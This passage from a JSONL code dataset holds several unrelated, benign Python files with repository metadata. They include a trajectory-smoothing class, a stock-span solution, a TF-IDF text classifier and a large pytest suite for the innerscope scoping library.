config\n","repo_name":"Mockingbird01001/NLG-code-generator-LSTM","sub_path":"work/data/data_model/batch_3/adagrad.py.transformed.py","file_name":"adagrad.py.transformed.py","file_ext":"py","file_size_in_byte":5291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2032144674","text":"from nazhigai_calc import *\nfrom time_convert import *\n\n\n\n# start : daytime\n# end : daytime\n# vibagam: int\n# no_vibagam : int\n\nclass kalavibagam:\n    def __init__(self,start,end,vibagam,no_vibagam):\n        self.start = start\n        self.end = end\n        self.no_vibagam = no_vibagam\n        self.alavu = end - start\n        self.vibagam = self.alavu/vibagam\n        self.vibagam_tr = timedelta(seconds=self.vibagam.seconds) # time rounded\n        no_v = self.no_vibagam-1\n        self.start_time = self.start + self.vibagam_tr*no_v\n        self.end_time = self.start_time + self.vibagam_tr\n        return\n\n","repo_name":"swadharm/sw_api","sub_path":"panjangam_api/kalavibagam.py","file_name":"kalavibagam.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25692136594","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\nimport numpy as np\nimport pandas as pd\nfrom Point import Point\n\n\nclass Trajectory(object):\n    \"\"\"\n    1. Метод, который кушает одну приходящую точку (x, y, z, v_x=np.nan, v_y=np.nan, v_z=np.nan, a_x=np.nan,\n    a_y=np.nan, a_z=np.nan),\n    если тестовый режим работы - зашумляем, если присутствуют только координаты, *считает* скорости, ускорения и\n    сохраняет это в self.x_list, self...\n    2. Внутренний методы просчёта, фильтрации и аппроксимации траекторий.\n    3. Метод для тестового зашумления данных и тд\n    \"\"\"\n\n    def __init__(self):\n        # Координаты, скорости, ускорения и таймстампы точек траектории\n        self.trajectory = []\n        # Значения точек траектории, полученные после её обработки одним\n        # или несколькими последовательно примененными алгоритмами фильтрации\n        # и интерполяции\n        self.filtered_trajectory = []\n        self.trajectory_id = None\n        self.trajectory_type = None\n\n    def add_point_by_coordinates(self, timestamp, x, y, z,\n                                 v_x=np.nan, v_y=np.nan, v_z=np.nan,\n                                 a_x=np.nan, a_y=np.nan, a_z=np.nan):\n        self.add_point(Point(timestamp, x, y, z, v_x, v_y, v_z, a_x, a_y, a_z))\n        return self\n\n    def add_point(self, point):\n        \"\"\"\n        Добавление новой точки:\n\n        Аргументы:\n            point: Point: объект класса Point,\n        \"\"\"\n        self.trajectory.append(point)\n        self.filtered_trajectory = self.trajectory\n        # для пересчёта траектории с фильтрацией раскомментировать следующую строчку:\n        # self._filter_trajectory(filtring_type=\"l1_filtering\")\n\n        if len(self.trajectory) > 1:\n            self._recompute_speed()\n        if len(self.trajectory) > 2:\n            self._recompute_accelerations()\n        return self\n\n    def get_info_object(self):\n        \"\"\"\n        Получает информацию об объекте в крайней точке\n        :return: Лист с информацией\n        \"\"\"\n        last_point = self.trajectory[-1]\n        coordinate = last_point.get_coordinates()\n        speed = last_point.get_speed(), last_point.get_speed_value()\n        acceleration = last_point.get_acceleration(), last_point.get_acceleration_value()\n        return coordinate, speed, acceleration\n\n    def _recompute_speed(self):\n        \"\"\"\n        Функция вычисления скорости по вновь пришедшей и предыдущей точке.\n        \"\"\"\n        last_point = self.filtered_trajectory[-2]\n        current_point = self.filtered_trajectory[-1]\n        v = (current_point.get_coordinates() - last_point.get_coordinates() + len(self.trajectory) * 0.00000001) / \\\n            
(current_point.timestamp - last_point.timestamp).total_seconds()\n current_point.set_speed(v[0], v[1], v[2])\n\n def _recompute_accelerations(self):\n \"\"\"\n Функция вычисления ускорения по вновь пришедшей и предыдущей точке.\n \"\"\"\n last_point = self.filtered_trajectory[-2]\n current_point = self.filtered_trajectory[-1]\n a_x, a_y, a_z = (current_point.get_speed() - last_point.get_speed()) / \\\n (current_point.timestamp - last_point.timestamp).total_seconds()\n current_point.set_acceleration(a_x, a_y, a_z)\n\n def _filter_trajectory(self, filtring_type=None):\n\n import copy\n \"\"\"\n Фильтрация и сглаживание траектории одним из способов:\n Нужно минимум window точек\n \"\"\"\n\n def savgol(arr, window=15, order=5, deriv=0, rate=1):\n \"\"\"\n Функция вычисления сглаживания Сав в окне\n\n :param arr: list-like: список точек\n :param window: int: окно, в котором происходит сглаживание\n :param order: int: порядок сглаживания\n :param deriv: int: порядок производной\n :param rate: int:\n :return:\n \"\"\"\n # window >= order + 2\n from math import factorial\n\n if len(arr) < window:\n window = len(arr)\n if window < order + 2:\n order = window - 2\n\n y = np.asarray(arr[:])\n order_range = range(order + 1)\n half_window = (window - 1) // 2\n b = np.mat([[k ** j for j in order_range] for k in range(-half_window, half_window + 1)])\n m = np.linalg.pinv(b).A[deriv] * rate ** deriv * factorial(deriv)\n firstvals = y[0] - np.abs(y[1:half_window + 1][::-1] - y[0])\n lastvals = y[-1] + np.abs(y[-half_window - 1:-1][::-1] - y[-1])\n y = np.concatenate((firstvals, y, lastvals))\n return np.convolve(m[::-1], y, mode='valid')\n\n # вычисление сглаживания отдельно для каждой из координат:\n self.filtered_trajectory = copy.deepcopy(self.trajectory)\n if len(self.filtered_trajectory) > 2:\n filtered_coordinate = savgol([self.trajectory[i].x for i in range(len(self.trajectory))])\n for i in range(len(self.filtered_trajectory)):\n self.filtered_trajectory[i].x = filtered_coordinate[i]\n filtered_coordinate = savgol([self.trajectory[i].y for i in range(len(self.trajectory))])\n for i in range(len(self.filtered_trajectory)):\n self.filtered_trajectory[i].y = filtered_coordinate[i]\n filtered_coordinate = savgol([self.trajectory[i].z for i in range(len(self.trajectory))])\n for i in range(len(self.filtered_trajectory)):\n self.filtered_trajectory[i].z = filtered_coordinate[i]\n\n return self.filtered_trajectory\n\n def get_coordinates_list(self):\n \"\"\"\n Метод, который выдаёт список координат в формате [[t_1, ..., t_n],\n [x_1, ..., x_n], [y_1, ..., y_n], [z_1, ..., z_n], ]\n \"\"\"\n ts = [coord.timestamp for coord in self.filtered_trajectory]\n xs = [coord.x for coord in self.filtered_trajectory]\n ys = [coord.y for coord in self.filtered_trajectory]\n zs = [coord.z for coord in self.filtered_trajectory]\n\n return ts, xs, ys, zs\n\n def load_trajectory(self, filename=\"data/trajectories/ID001.json\"):\n \"\"\"\n Функция загрузки траектории из файла.\n\n :param filename: str: Строка, указывающая полный путь до файла траектории\n :return:\n \"\"\"\n df = pd.read_json(filename, orient=\"records\", lines=True)\n df = df.iloc[len(self.trajectory):]\n for point_ in df.iterrows():\n ts, xs, ys, zs = point_[1].values\n self.add_point_by_coordinates(ts, xs, ys, zs)\n\n def save_trajectory(self, filename=\"data/trajectories/ID001.json\", ):\n \"\"\"\n Функция сохранения траектории в файл.\n\n :param filename: str: Строка, указывающая полный путь до файла траектории\n :return:\n \"\"\"\n\n ts, xs, ys, zs = 
self.get_coordinates_list()\n df = pd.DataFrame(np.array([[t.isoformat() for t in ts], xs, ys, zs]).T, columns=[\"timestamp\", \"x\", \"y\", \"z\"])\n\n df.to_json(filename, orient=\"records\", lines=True)\n","repo_name":"elejke/rocket_aimer","sub_path":"Trajectory.py","file_name":"Trajectory.py","file_ext":"py","file_size_in_byte":8117,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17222967492","text":"# problem and test cases:\n# @GeekforGeeks: https://practice.geeksforgeeks.org/problems/stock-span-problem/0\ndef getSpan():\n stack=[]\n span =[0 for i in range(n)]\n for i in range(n):\n if(len(stack) ==0):\n span[i]=i+1\n else:\n while(len(stack)!=0 and arr[stack[-1]]<= arr[i] ):\n stack.pop()\n if(len(stack)==0):\n span[i]=i+1\n else:\n span[i]=i-stack[-1]\n stack.append(i)\n print(\" \".join(str(x) for x in span))\n\ntest = int(input())\nfor i in range(test):\n n = int(input())\n arr = list(map(int,input().strip().split(\" \")))\n getSpan()\n ","repo_name":"rahul-raj-s/stackProblems","sub_path":"stockSpan/stockSpan.py","file_name":"stockSpan.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"35646817757","text":"from __future__ import absolute_import\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.svm import LinearSVC\nfrom sklearn.naive_bayes import MultinomialNB\n\nimport torch\nimport os\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import ConfusionMatrixDisplay, classification_report\nfrom sklearn.metrics import cohen_kappa_score\n\n\ndef load_data(is_mt5=True):\n if is_mt5:\n path = 'mt5'\n dev_data = pd.read_json(\"/data/results/dataset/mt5/dev_dataset.json\")\n train_data = pd.read_json(\"/data/results/dataset/mt5/train_dataset.json\")\n else:\n path = 't5'\n dev_data = pd.read_json(\"/data/results/dataset/t5/dev_dataset.json\")\n train_data = pd.read_json(\"/data/results/dataset/t5/train_dataset.json\")\n \n return train_data, dev_data, path\n\n\ndef preprocess_data(dev_data, train_data):\n dev_data = dev_data.sample(frac=1, random_state=420).reset_index(drop=True)\n train_data = train_data.sample(frac=1, random_state=420).reset_index(drop=True)\n \n dev_data['label'] = dev_data['label'].replace({'refute': 0, 'support': 1})\n train_data['label'] = train_data['label'].replace({'refute': 0, 'support': 1})\n \n y_test = dev_data['label'].values\n y_train = train_data['label'].values\n \n vectorizer = TfidfVectorizer(\n sublinear_tf=True, max_df=0.5, min_df=5, stop_words=None\n )\n \n X_train = vectorizer.fit_transform(list(train_data['claim']))\n X_test = vectorizer.transform(list(dev_data['claim']))\n\n target_names = ['refute', 'support']\n\n return X_train, X_test, y_train, y_test, target_names\n\n\ndef process():\n for model_type in [True, False]: \n train_data, dev_data, path = load_data(is_mt5=model_type)\n\n if model_type:\n print(\"Evaluating mT5 dataset...\")\n else:\n print(\"Evaluating T5 dataset...\")\n\n X_train, X_test, y_train, y_test, target_names = preprocess_data(dev_data=dev_data, train_data=train_data)\n\n model = LogisticRegression(random_state=0, max_iter=1000)\n base_dir = '/data/results/experiments'\n \n if not os.path.exists(base_dir):\n os.makedirs(base_dir)\n \n path = base_dir + '/' + path\n if not os.path.exists(path):\n os.makedirs(path)\n\n 
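# --- Editor's note (not part of the scraped file): the fit/predict steps
# below chain the TfidfVectorizer and LogisticRegression (both imported at
# the top of this file) by hand; the same flow can be bundled in a sklearn
# Pipeline. A hedged sketch -- train_claims/y_train are placeholder names
# for the data prepared above:
from sklearn.pipeline import Pipeline

text_clf = Pipeline([
    ("tfidf", TfidfVectorizer(sublinear_tf=True, max_df=0.5, min_df=5)),
    ("logreg", LogisticRegression(random_state=0, max_iter=1000)),
])
# text_clf.fit(train_claims, y_train); text_clf.predict(dev_claims)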
model.fit(X_train, y_train)\n        pred = model.predict(X_test)\n\n        print(model.__class__.__name__)\n        print(classification_report(y_test,pred, target_names=target_names))\n\n        fig, ax = plt.subplots(figsize=(10, 5))\n        ConfusionMatrixDisplay.from_predictions(y_test, pred, ax=ax)\n        ax.xaxis.set_ticklabels(target_names)\n        ax.yaxis.set_ticklabels(target_names)\n        _ = ax.set_title(\n            f\"Confusion Matrix for {model.__class__.__name__}\"\n        )\n        plt.savefig(path + '/' + model.__class__.__name__ + \".png\")\n\n\nif __name__==\"__main__\":\n    if torch.cuda.is_available() and torch.cuda.device_count() > 1:\n        with torch.cuda.device(0):\n            process()","repo_name":"xkamen21/designing-a-multilingual-fact-checking-dataset-from-existing-question-answering-data","sub_path":"code/experiments/classifier.py","file_name":"classifier.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22895779461","text":"import pickle\n\nimport pytest\n\nimport innerscope\nfrom innerscope import cfg, scoped_function\n\nglobal_x = 1\nhex = 1 # shadow a builtin\n\n\ndef test_version():\n    assert innerscope.__version__ >= \"0.5\"\n\n\ndef test_no_args():\n    @scoped_function\n    def f1():\n        a = 1\n        b = a + 1\n\n    assert not f1.missing\n    scope1 = f1()\n    assert len(scope1) == 2\n    assert scope1 == dict(a=1, b=2)\n    assert scoped_function(f1)() == dict(a=1, b=2)\n\n    def f2():\n        c = b + 1\n\n    def check(f2bound):\n        assert not f2bound.missing\n        assert f2bound.inner_names == {\"c\"}\n        assert f2bound.outer_scope[\"b\"] == 2\n        scope2 = f2bound()\n        assert scope2 == dict(b=2, c=3)\n\n    check(innerscope.bindwith(b=2)(f2))\n    check(innerscope.bindwith({\"b\": 2})(f2))\n\n    sf2 = scoped_function(f2)\n    assert sf2.missing == {\"b\"}\n    with pytest.warns(UserWarning, match=\"Undefined variables: 'b'\"), pytest.raises(NameError):\n        sf2()\n\n    check(sf2.bind(b=2))\n    check(sf2.bind({\"b\": 2}))\n    check(sf2.bind(scope1))\n    check(scope1.bindto(sf2))\n    check(scope1.bindto(sf2.func))\n    check(scoped_function(sf2, scope1))\n    check(scoped_function(sf2.func, scope1))\n\n\ndef test_no_args_call():\n    def f1():\n        a = 1\n        b = a + 1\n\n    def check(scope1):\n        assert scope1 == dict(a=1, b=2)\n\n    scope1 = innerscope.call(f1)\n    check(scope1)\n    check(innerscope.callwith()(f1))\n\n    def f2():\n        c = b + 1\n\n    def check(scope2):\n        assert scope2 == dict(b=2, c=3)\n\n    check(scope1.call(f2))\n    check(scope1.callwith()(f2))\n\n    with pytest.raises(TypeError, match=\"missing 1 required positional\"):\n        scope1.call()\n    with pytest.raises(TypeError, match=\"missing 1 required positional\"):\n        innerscope.call()\n\n\ndef test_with_args():\n    def f1(a):\n        b = a + 1\n\n    def check(scope1):\n        assert scope1 == dict(a=1, b=2)\n\n    assert not scoped_function(f1).missing\n    scope1 = scoped_function(f1)(1)\n    check(scope1)\n    check(innerscope.call(f1, 1))\n    check(innerscope.callwith(1)(f1))\n\n    def f2(c):\n        d = a + 3\n        e = b + c\n\n    def check(scope2):\n        assert scope2 == dict(a=1, b=2, c=3, d=4, e=5)\n\n    sf2 = scoped_function(f2)\n    assert sf2.missing == {\"a\", \"b\"}\n    check(sf2.bind(a=1, b=2)(3))\n    check(sf2.bind({\"a\": 1}, {\"b\": 2})(3))\n    check(sf2.bind(scope1)(3))\n    check(scope1.bindto(sf2)(3))\n    check(scope1.bindto(f2)(3))\n    check(scope1.call(f2, 3))\n    check(scope1.callwith(3)(f2))\n\n\ndef test_scoped_function_decorators():\n    @scoped_function\n    def f1():\n        a = 1\n\n    @scoped_function()\n    def f2():\n        a = 1\n\n    @scoped_function({\"a\": 1})\n    def f3():\n        b = a + 1\n\n    assert f1() == {\"a\": 1}\n    assert f2() == 
{\"a\": 1}\n assert f3() == {\"a\": 1, \"b\": 2}\n\n\ndef test_bindto_keeps_options():\n @scoped_function(use_closures=True, use_globals=False)\n def f1():\n a = 1\n\n def f2():\n b = a + 1\n\n scope1 = f1()\n sf2 = scope1.bindto(f2)\n assert sf2.use_closures is True\n assert sf2.use_globals is False\n\n sf2 = scope1.bindto(f2, use_closures=False, use_globals=True)\n assert sf2.use_closures is False\n assert sf2.use_globals is True\n assert dict(sf2()) == {\"a\": 1, \"b\": 2}\n\n\ndef test_use_closure():\n a = b = c = d = e = x = y = -1\n\n def f1(a):\n b = a + x + 2\n\n assert not scoped_function(f1).missing\n assert scoped_function(f1, use_closures=False).missing == {\"x\"}\n\n # Overwrite closure\n scope1 = scoped_function(f1, {\"x\": 10})(1)\n assert scope1 == dict(x=10, a=1, b=13)\n\n # Default closure\n scope1 = scoped_function(f1)(1)\n assert scope1 == dict(x=-1, a=1, b=2)\n\n def f2(c):\n d = a + 2 + y\n e = b + c\n\n assert not scoped_function(f2).missing\n\n # Overwrite closure\n scope2 = scoped_function(f2).bind(scope1, y=1)(3)\n assert scope2 == dict(y=1, a=1, b=2, c=3, d=4, e=5)\n\n # Overwrite closure (partially)\n scope2 = scoped_function(f2, scope1)(3)\n assert scope2 == dict(y=-1, a=1, b=2, c=3, d=2, e=5)\n\n # Default closure\n scope2 = scoped_function(f2)(3)\n assert scope2 == dict(y=-1, a=-1, b=-1, c=3, d=0, e=2)\n\n\ndef test_use_globals():\n def f1():\n x = global_x\n\n assert not scoped_function(f1, use_globals=True).missing\n assert scoped_function(f1, use_globals=False).missing == {\"global_x\"}\n assert scoped_function(f1, use_globals=True)() == {\"x\": 1, \"global_x\": 1}\n scope = scoped_function(f1, {\"global_x\": 1}, use_globals=True)()\n assert scope == {\"x\": 1, \"global_x\": 1}\n\n\ndef test_closures():\n def f(arg_f):\n nonlocal_y = 2\n\n def g(arg_g):\n local_z = global_x + nonlocal_y + arg_f + arg_g\n\n return g\n\n assert scoped_function(f).inner_names == {\"arg_f\", \"nonlocal_y\", \"g\"}\n g = f(1)\n scoped_g = scoped_function(g)\n assert scoped_g.inner_names == {\"arg_g\", \"local_z\"}\n assert scoped_g.outer_scope == {\"global_x\": 1, \"arg_f\": 1, \"nonlocal_y\": 2}\n assert scoped_g(3) == {\"arg_f\": 1, \"nonlocal_y\": 2, \"global_x\": 1, \"arg_g\": 3, \"local_z\": 7}\n\n\ndef test_has_builtins():\n @innerscope.call\n def f():\n x = min(1, 2)\n d = dict(a=x, b=3)\n\n assert f == dict(x=1, d={\"a\": 1, \"b\": 3})\n\n\ndef test_raises_error():\n @scoped_function\n def f():\n 1 / 0\n\n with pytest.raises(ZeroDivisionError):\n f()\n\n\ndef test_return_values():\n @innerscope.call\n def f1():\n pass\n\n assert f1.return_value is None\n assert f1 == {}\n\n @innerscope.call\n def f2():\n return 5\n\n assert f2.return_value == 5\n assert f2 == {}\n\n @innerscope.callwith(0)\n def f3(x):\n y = x + 1\n return x + 1 + y\n\n assert f3.return_value == 2\n assert f3 == {\"x\": 0, \"y\": 1}\n\n\ndef test_early_return():\n # We do not yet check for return statements in the function body upon creation\n @scoped_function\n def f(boolean):\n if boolean:\n return 42\n a = 1\n b = a + 1\n\n # But we can check the return type\n # with pytest.raises(ValueError, match=\"must return at the very end of the function\"):\n # f(True)\n scope = f(True)\n assert scope == {\"boolean\": True}\n assert scope.return_value == 42\n\n scope = f(False)\n assert scope == dict(a=1, b=2, boolean=False)\n\n @scoped_function\n def g(boolean):\n if boolean:\n return (1, 2, 3)\n a = 1\n b = a + 1\n\n # with pytest.raises(ValueError, match=\"must return at the very end of the function\"):\n # 
g(True)\n scope = g(True)\n assert scope == {\"boolean\": True}\n assert scope.return_value == (1, 2, 3)\n\n scope = g(False)\n assert scope == dict(a=1, b=2, boolean=False)\n\n\ndef test_difficult_return():\n # fmt: off\n x = 1\n\n @scoped_function\n def f1(arg):\n if arg:\n return 1\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n y = x\n return 2\n\n if cfg.default_method == \"bytecode\":\n with pytest.raises(ValueError, match=\"The first return statement is too far away\"):\n f1(True)\n if cfg.default_method == \"trace\":\n scope = f1(True)\n assert scope == {\"x\": 1, \"arg\": True}\n assert scope.return_value == 1\n\n scope = f1(False)\n assert scope == {\"arg\": False, \"y\": 1, \"x\": 1}\n assert scope.return_value == 2\n\n @scoped_function\n def f2(arg):\n if arg == 0:\n return 1\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n if arg == 1:\n return 2\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n y = x\n return 3\n\n scope = f2(0)\n assert scope == {\"arg\": 0, \"x\": 1}\n assert scope.return_value == 1\n\n scope = f2(1)\n assert scope == {\"arg\": 1, \"x\": 1}\n assert scope.return_value == 2\n scope = f2(2)\n assert scope == {\"arg\": 2, \"x\": 1, \"y\": 1}\n assert scope.return_value == 3\n\n @scoped_function\n def f3(arg):\n if arg == 0:\n return 1\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n if arg == 1:\n return (1, 2, 3)\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ; x ;\n if arg == 2:\n return 3\n y = x\n return 4\n\n if cfg.default_method == \"bytecode\":\n with pytest.raises(ValueError, match=\"The first 2 return statements are too far away\"):\n f3(0)\n with pytest.raises(ValueError, match=\"The first 2 return statements are too far away\"):\n f3(1)\n if cfg.default_method == \"trace\":\n scope = f3(0)\n assert scope == {\"arg\": 0, \"x\": 1}\n assert scope.return_value == 1\n scope = f3(1)\n assert scope == {\"arg\": 1, \"x\": 1}\n assert scope.return_value == (1, 2, 3)\n scope = f3(2)\n assert scope == {\"arg\": 2, \"x\": 1}\n assert scope.return_value == 3\n scope = f3(3)\n assert scope == {\"arg\": 3, \"x\": 1, \"y\": 1}\n assert scope.return_value == 4\n # fmt: on\n\n\n# @pytest.mark.xfail(reason=\"Local variable can't yet be the same name as an outer variable\")\n# This limitation may actually be okay to live with\ndef test_inner_and_outer_variable():\n def f1():\n x = 1\n\n scope1 = innerscope.call(f1)\n assert scope1 == {\"x\": 1}\n\n @scope1.bindto\n def f2():\n x = x + 1 # pragma: no cover\n\n with pytest.raises(\n UnboundLocalError,\n match=\"local variable 'x' referenced before assignment.\\n\\nThis probably\"\n 
\"|cannot access local variable 'x' where it is not associated with a value.\"\n \"\\n\\nThis probably\",\n ):\n f2()\n\n @scoped_function\n def f3():\n raise UnboundLocalError(\"hahaha\")\n\n with pytest.raises(UnboundLocalError, match=\"hahaha$\"):\n f3()\n\n\ndef test_default_args():\n @innerscope.callwith(0, z=3)\n def f(w, x=1, *args, y=2, z, **kwargs):\n pass\n\n assert f == {\"w\": 0, \"x\": 1, \"y\": 2, \"z\": 3, \"args\": (), \"kwargs\": {}}\n\n\ndef test_list_comprehension():\n closure_val = 2\n\n def f():\n y = [i for i in range(global_x)]\n z = [j for j in range(closure_val)]\n\n assert innerscope.call(f) == {\"y\": [0], \"z\": [0, 1], \"global_x\": 1, \"closure_val\": 2}\n scoped_f = scoped_function(f, use_globals=False, use_closures=False)\n assert scoped_f.missing == {\"global_x\", \"closure_val\"}\n scope = scoped_f.bind(global_x=2, closure_val=1)()\n assert scope == {\"y\": [0, 1], \"z\": [0], \"global_x\": 2, \"closure_val\": 1}\n\n\ndef test_inner_functions():\n def f():\n closure_val = 10\n\n def g():\n y = global_x + 1\n z = closure_val + 1\n return y, z\n\n scope = innerscope.call(f)\n assert scope.keys() == {\"closure_val\", \"g\", \"global_x\"}\n assert scope[\"g\"]() == (2, 11)\n scoped_f = scoped_function(f, use_globals=False, use_closures=False)\n assert scoped_f.missing == {\"global_x\"}\n scope = scoped_f.bind(global_x=2)()\n assert scope.keys() == {\"closure_val\", \"g\", \"global_x\"}\n assert scope[\"g\"]() == (3, 11)\n\n\ndef test_inner_class():\n def f1():\n class A:\n x = global_x + 1\n\n scope = innerscope.call(f1)\n assert scope.keys() == {\"A\", \"global_x\"}\n assert scope[\"A\"].x == 2\n scoped_f = scoped_function(f1, use_globals=False, use_closures=False)\n assert scoped_f.missing == {\"global_x\"}\n assert scoped_f.bind(global_x=2)()[\"A\"].x == 3\n\n a = 10\n\n def f2():\n b = 100\n\n def g(self):\n pass\n\n class A:\n x = global_x + 1\n\n def __init__(self):\n pass\n\n y = x + 1\n z = a + b\n gm = g\n\n scope = innerscope.call(f2)\n assert scope.outer_scope.keys() == {\"a\", \"global_x\"}\n assert scope.inner_scope.keys() == {\"b\", \"g\", \"A\"}\n assert scope[\"A\"].x == 2\n assert scope[\"A\"].z == 110\n assert scope[\"A\"]().gm() is None\n scoped_f = scoped_function(f2, use_globals=False, use_closures=False)\n assert scoped_f.missing == {\"a\", \"global_x\"}\n scope = scoped_f.bind(a=20, global_x=2)()\n assert scope[\"A\"].x == 3\n assert scope[\"A\"].z == 120\n\n\ndef test_bad_method():\n def f():\n x = 1\n\n with pytest.raises(ValueError, match=\"method= argument to ScopedFunc\"):\n scoped_function(f, method=\"bad_method\")\n old_default = cfg.default_method\n try:\n cfg.default_method = \"bad_method\"\n with pytest.raises(ValueError, match=\"method= argument to ScopedFunc\"):\n scoped_function(f)\n cfg.default_method = \"default\"\n with pytest.raises(ValueError, match=\"silly\"):\n scoped_function(f)\n finally:\n cfg.default_method = old_default\n assert innerscope.call(f) == {\"x\": 1}\n\n\ndef test_generator():\n def f():\n foo = 2\n yield 5\n yield global_x\n return 10\n\n gf = scoped_function(f)\n [x, y] = gf()\n assert x == 5\n assert y == 1\n\n gen = gf()\n try:\n while True:\n next(gen)\n except StopIteration as exc:\n scope = exc.value\n assert scope == {\"foo\": 2, \"global_x\": 1}\n assert scope.return_value == 10\n\n\ndef test_coroutine():\n async def f(): # pragma: no cover\n await 5\n\n with pytest.raises(ValueError, match=\"does not yet work on coroutine functions\"):\n scoped_function(f)\n\n\ndef test_asyncgen():\n async 
def f(): # pragma: no cover\n yield 5\n\n with pytest.raises(ValueError, match=\"does not yet work on async generator functions\"):\n scoped_function(f)\n\n\ndef test_classmethod():\n class A:\n @scoped_function\n def f(self):\n x = 1\n y = x + 1\n return y + 1\n\n @classmethod\n @scoped_function\n def g(cls):\n x = 10\n y = x + 10\n return y + 10\n\n @scoped_function\n def h(self):\n x = 100\n yield x\n return x + 100\n\n a = A()\n scope = a.f()\n assert scope == {\"self\": a, \"x\": 1, \"y\": 2}\n assert scope.return_value == 3\n\n scope = A.g()\n assert scope == {\"cls\": A, \"x\": 10, \"y\": 20}\n assert scope.return_value == 30\n\n gen = a.h()\n assert next(gen) == 100\n try:\n next(gen)\n except StopIteration as exc:\n scope = exc.value\n assert scope == {\"self\": a, \"x\": 100}\n assert scope.return_value == 200\n\n\ndef test_shadow_builtins():\n min = 1\n\n def f(sum):\n dict = min + sum + max\n return dict + 1\n\n sf = scoped_function(f)\n assert sf.missing == set()\n assert sf.outer_scope == {\"min\": 1}\n assert sf.builtin_names == {\"max\"}\n\n sf = scoped_function(f, {\"max\": 100, \"bool\": 999})\n\n assert sf.missing == set()\n assert sf.outer_scope == {\"min\": 1, \"max\": 100}\n assert sf.builtin_names == set()\n scope = sf(10)\n assert scope == {\"min\": 1, \"sum\": 10, \"max\": 100, \"dict\": 111}\n assert scope.return_value == 112\n\n sf = scoped_function(f, use_closures=False)\n assert sf.missing == {\"min\"}\n assert sf.outer_scope == {}\n assert sf.builtin_names == {\"max\"}\n\n sf = scoped_function(f, {\"min\": 1000, \"max\": 100, \"bool\": 999}, use_closures=False)\n assert sf.missing == set()\n assert sf.outer_scope == {\"min\": 1000, \"max\": 100}\n assert sf.builtin_names == set()\n scope = sf(10)\n assert scope == {\"min\": 1000, \"sum\": 10, \"max\": 100, \"dict\": 1110}\n assert scope.return_value == 1111\n\n def g():\n a = hex + 1\n\n sg = scoped_function(g)\n assert sg.inner_names == {\"a\"}\n assert sg.outer_scope == {\"hex\": 1}\n assert sg.builtin_names == set()\n assert sg.missing == set()\n assert sg() == {\"a\": 2, \"hex\": 1}\n\n sg = scoped_function(g, use_globals=False)\n assert sg.inner_names == {\"a\"}\n assert sg.outer_scope == {}\n assert sg.missing == set()\n assert sg.builtin_names == {\"hex\"}\n\n sg = sg.bind(hex=100)\n assert sg.inner_names == {\"a\"}\n assert sg.outer_scope == {\"hex\": 100}\n assert sg.builtin_names == set()\n assert sg.missing == set()\n assert sg() == {\"a\": 101, \"hex\": 100}\n\n\ndef test_from_scopedgenerator():\n def gen():\n x = 1\n\n sgen = scoped_function(gen)\n sgen2 = scoped_function(sgen)\n assert sgen() == {\"x\": 1}\n assert sgen2() == {\"x\": 1}\n\n\ndef test_bad_type():\n def f(x):\n y = x + 1\n return y + 1\n\n cf = classmethod(f)\n with pytest.raises(TypeError, match=\"expects a Python function\"):\n scoped_function(cf)\n assert innerscope.call(f, 1) == {\"x\": 1, \"y\": 2}\n\n\n# Define globally so pickle can find it easily\ndef global_func():\n a = 1\n b = a + 1\n\n\ndef test_pickle():\n f = scoped_function(global_func)\n assert f() == dict(a=1, b=2)\n s = pickle.dumps(f)\n f2 = pickle.loads(s)\n assert f2() == dict(a=1, b=2)\n","repo_name":"eriknw/innerscope","sub_path":"innerscope/tests/test_core.py","file_name":"test_core.py","file_ext":"py","file_size_in_byte":17664,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"21"} +{"seq_id":"70467852212","text":"from random import randint\n\nresultados = ['Cara', 'Coroa']\nconts = [0, 0]\nwhile True:\n esc = 
